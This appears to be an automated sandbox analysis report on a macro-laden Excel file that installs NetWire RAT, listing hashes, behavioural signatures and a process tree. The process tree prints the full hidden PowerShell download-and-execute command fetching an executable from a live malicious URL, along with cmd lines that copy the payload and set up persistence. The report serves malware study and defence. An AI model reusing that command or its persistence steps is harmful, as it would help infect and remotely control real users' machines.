Analysis
- max time kernel: 135s
- max time network: 130s
- platform: windows10_x64
- resource: win10
- submitted: 29-06-2020 19:51
- Static task: static1
- Behavioral task: behavioral1
- Sample: PO29062020.xlsm
- Resource: win7v200430
General
- Target: PO29062020.xlsm
- Size: 407KB
- MD5: 2958c347433029ff3d06f2e3f32a735b
- SHA1: b729fbe5d5642ca5987db47352b134797852d097
- SHA256: d70d7499eec43adaa9d908f4df45fbb064a53e488f765ec5a5cb99baf1285389
- SHA512: 0ff681ca3254a6ae552b91a9017aa660725e148c35adaebc830f7f37778d8a1f05fe64681fbc9732a7e6c6992c325f2c7c14eac20f813e78a15de8f28bba28d6
Malware Config
- Extracted: http://longi.ca/wdfr.exe
Signatures

- Process spawned unexpected child process (1 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: powershell.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3608 | 3832 | powershell.exe | EXCEL.EXE

- Suspicious use of SetThreadContext (1 IoCs)
  Processes: putty.exe
  description | pid | process | target process
  PID 416 set thread context of 1568 | 416 | putty.exe | whdhost.exe

- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes: powershell.exe, putty.exe
  description | pid | process
  Token: SeDebugPrivilege | 3608 | powershell.exe
  Token: SeDebugPrivilege | 416 | putty.exe

- NTFS ADS (1 IoCs)
  Processes: cmd.exe
  description | ioc | process
  File created | C:\Users\Admin\AppData\Local\Temp\FolderN\name.exe:Zone.Identifier | cmd.exe

- Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  Processes: EXCEL.EXE
  pid | process
  3832 | EXCEL.EXE

- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe, putty.exe
  pid | process
  3608 | powershell.exe (3 entries)
  416 | putty.exe (2 entries)

- NetWire RAT payload (2 IoCs)
  resource | yara_rule
  behavioral2/memory/1568-8-0x0000000000400000-0x0000000000433000-memory.dmp | netwire
  behavioral2/memory/1568-11-0x0000000000400000-0x0000000000433000-memory.dmp | netwire

- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE

- Suspicious use of SetWindowsHookEx (14 IoCs)
  Processes: EXCEL.EXE
  pid | process
  3832 | EXCEL.EXE (14 identical entries)

- Suspicious use of WriteProcessMemory (22 IoCs)
  Processes: EXCEL.EXE, powershell.exe, putty.exe
  description | pid | process | target process
  PID 3832 wrote to memory of 3608 | 3832 | EXCEL.EXE | powershell.exe (2 entries)
  PID 3608 wrote to memory of 416 | 3608 | powershell.exe | putty.exe (3 entries)
  PID 416 wrote to memory of 1568 | 416 | putty.exe | whdhost.exe (11 entries)
  PID 416 wrote to memory of 2396 | 416 | putty.exe | cmd.exe (3 entries)
  PID 416 wrote to memory of 2384 | 416 | putty.exe | cmd.exe (3 entries)

- Blacklisted process makes network request (1 IoCs)
  Processes: powershell.exe
  flow | pid | process
  10 | 3608 | powershell.exe

- Executes dropped EXE (2 IoCs)
  Processes: putty.exe, whdhost.exe
  pid | process
  416 | putty.exe
  1568 | whdhost.exe

- Drops startup file (1 IoCs)
  Processes: putty.exe
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.exe.lnk | putty.exe

- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Processes (process tree; indentation shows parent/child depth)

- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO29062020.xlsm"
  Signatures: Suspicious behavior: AddClipboardFormatListener; Checks processor information in registry; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory; Enumerates system info in registry

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://longi.ca/wdfr.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
    Signatures: Process spawned unexpected child process; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory; Blacklisted process makes network request

    - C:\Users\Admin\AppData\Local\Temp\putty.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\putty.exe"
      Signatures: Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory; Executes dropped EXE; Drops startup file

      - C:\Users\Admin\AppData\Local\Temp\whdhost.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\whdhost.exe"
        Signatures: Executes dropped EXE

      - C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c copy "C:/Users/Admin/AppData/Local/Temp/putty.exe" "%temp%\FolderN\name.exe" /Y

      - C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c echo [zoneTransfer]ZoneID = 2 > %temp%\FolderN\name.exe:Zone.Identifier
        Signatures: NTFS ADS
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\putty.exe
- C:\Users\Admin\AppData\Local\Temp\putty.exe
- C:\Users\Admin\AppData\Local\Temp\whdhost.exe
- memory/416-5-0x0000000000000000-mapping.dmp
- memory/1568-9-0x000000000040242D-mapping.dmp
- memory/1568-8-0x0000000000400000-0x0000000000433000-memory.dmp (Filesize: 204KB)
- memory/1568-11-0x0000000000400000-0x0000000000433000-memory.dmp (Filesize: 204KB)
- memory/2384-13-0x0000000000000000-mapping.dmp
- memory/2396-12-0x0000000000000000-mapping.dmp
- memory/3608-4-0x0000000000000000-mapping.dmp